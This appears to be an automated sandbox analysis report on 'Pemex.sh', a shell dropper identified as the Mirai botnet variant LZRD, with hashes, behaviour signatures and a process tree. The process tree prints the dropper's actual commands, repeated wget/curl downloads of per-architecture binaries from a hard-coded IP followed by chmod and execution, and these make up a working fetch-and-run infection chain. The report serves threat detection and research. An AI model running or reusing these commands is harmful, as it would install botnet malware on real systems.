Analysis

  • max time kernel
    123s
  • max time network
    152s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags
    arch:mipsel
    image:debian9-mipsel-20240611-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mipsel
    system
  • submitted
    23-12-2024 06:16

General

  • Target
    Pemex.sh
  • Size
    1KB
  • MD5
    e18ba04d72384ac85e6117c774f6d4f9
  • SHA1
    6cb8e9a2da2db042da0875a08f43cc867b8a2c5b
  • SHA256
    289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e
  • SHA512
    3e69c0fdb07347f2dcd8d3b3d9514d392a572173afec60fd702180cf3f7d5d21bca67dff2cb022641c7f0a2df4b817f1589a6a1599726ddeea67ba5c768e954d

Malware Config

Extracted

  • Family
    mirai
  • Botnet
    LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large number (85022) of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 16 IoCs

    Malware like Mirai modifies the Watchdog to prevent it from restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 8 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Reads system network configuration 1 TTPs 8 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/Pemex.sh
    /tmp/Pemex.sh
    1⤵
    • Writes file to tmp directory
    PID:703
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.x86
      2⤵
      • Writes file to tmp directory
      PID:706
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.x86
      2⤵
      • Writes file to tmp directory
      PID:724
    • /bin/cat
      cat loligang.x86
      2⤵
      PID:733
    • /bin/chmod
      chmod +x awoo loligang.x86 Pemex.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-wd1f59
      2⤵
      • File and Directory Permissions Modification
      PID:734
    • /tmp/awoo
      ./awoo
      2⤵
      • Executes dropped EXE
      PID:735
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.mips
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:737
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.mips
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:738
    • /bin/cat
      cat loligang.mips
      2⤵
      • System Network Configuration Discovery
      PID:739
    • /bin/chmod
      chmod +x awoo loligang.mips loligang.x86 Pemex.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-wd1f59
      2⤵
      • File and Directory Permissions Modification
      PID:740
    • /tmp/awoo
      ./awoo
      2⤵
      • Executes dropped EXE
      PID:741
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.mpsl
      2⤵
      • Writes file to tmp directory
      PID:743
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.mpsl
      2⤵
      • Writes file to tmp directory
      PID:746
    • /bin/cat
      cat loligang.mpsl
      2⤵
      PID:767
    • /bin/chmod
      chmod +x awoo loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-wd1f59
      2⤵
      • File and Directory Permissions Modification
      PID:768
    • /tmp/awoo
      ./awoo
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:769
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.arm4
      2⤵
      PID:774
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.arm4
      2⤵
      • Writes file to tmp directory
      PID:785
    • /bin/chmod
      chmod +x awoo loligang.arm4 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-wd1f59
      2⤵
      • File and Directory Permissions Modification
      PID:802
    • /tmp/awoo
      ./awoo
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:803
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.arm5
      2⤵
      • Writes file to tmp directory
      PID:807
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.arm5
      2⤵
      • Writes file to tmp directory
      PID:816
    • /bin/chmod
      chmod +x awoo loligang.arm4 loligang.arm5 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-wd1f59
      2⤵
      • File and Directory Permissions Modification
      PID:818
    • /tmp/awoo
      ./awoo
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:819
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.arm6
      2⤵
      • Writes file to tmp directory
      PID:823
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.arm6
      2⤵
      • Writes file to tmp directory
      PID:827
    • /bin/chmod
      chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-wd1f59
      2⤵
      • File and Directory Permissions Modification
      PID:829
    • /tmp/awoo
      ./awoo
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:830
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.arm7
      2⤵
      • Writes file to tmp directory
      PID:835
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.arm7
      2⤵
      • Writes file to tmp directory
      PID:851
    • /bin/chmod
      chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.x86 Pemex.sh
      2⤵
      • File and Directory Permissions Modification
      PID:870
    • /tmp/awoo
      ./awoo
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:871
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.ppc
      2⤵
      • Writes file to tmp directory
      PID:876
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.ppc
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:882
    • /bin/chmod
      chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.ppc loligang.x86 Pemex.sh
      2⤵
      • File and Directory Permissions Modification
      PID:884
    • /tmp/awoo
      ./awoo
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:885
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.m68k
      2⤵
      • Writes file to tmp directory
      PID:889
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.m68k
      2⤵
      • Writes file to tmp directory
      PID:893
    • /bin/chmod
      chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.m68k loligang.mips loligang.mpsl loligang.ppc loligang.x86 Pemex.sh
      2⤵
      • File and Directory Permissions Modification
      PID:898
    • /tmp/awoo
      ./awoo
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:899
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.sh4
      2⤵
      • Writes file to tmp directory
      PID:906
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.sh4
      2⤵
      • Writes file to tmp directory
      PID:907
    • /bin/chmod
      chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.m68k loligang.mips loligang.mpsl loligang.ppc loligang.sh4 loligang.x86 Pemex.sh
      2⤵
      • File and Directory Permissions Modification
      PID:909
    • /tmp/awoo
      ./awoo
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:910

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/awoo
    Filesize
    87KB
    MD5
    5f6d2539a443501c888fc90986479ee6
    SHA1
    1f1ce02f9cafc0e684559cd7e36170d6cba370dc
    SHA256
    5775d9b48bb5c73f8e4625ee86f07e33967aecca610947654e8eea692e200137
    SHA512
    3bd781322c46687a8d750c1129b843a2a2312b186094d5918d5d8eac8c0b04ef8ee14a6a14fb74eb557bdb6558f78301a597ee651c4ace2aa23ebe02554a7198
  • /tmp/awoo
    Filesize
    89KB
    MD5
    9a397c973a66d7380ca64d61070b88d3
    SHA1
    f6828d001883357d22adf948b087ca400c5498dc
    SHA256
    67b7d4c356522d870024d4f04289dc6bcc53537209478fe43347511abb7e63fc
    SHA512
    18c4d902787043acdc63b3640f6e405dc8f96be38fbd40664595b1c6224adddcfc7895a20417a0de140c8280dc117f3dc7e9bcbb9336b8f0eabfb9f44d7adb77
  • /tmp/loligang.x86
    Filesize
    64KB
    MD5
    2354f2531c0bf296738fa7733c42785f
    SHA1
    86508e4ee74c70bf226f6666bf227a12be69dcad
    SHA256
    3d0b5252c0f8736759af8b122612395ea484794afbdeb5435769f3c164d04c93
    SHA512
    eda30463d2e8355af4d6626815aedb78b1b5d43c4df53e4a9a72405074a22e9fd09f54e882b0c5ad5136202907a7e6e599d29d325d6e0b3188e6f8ff77abe679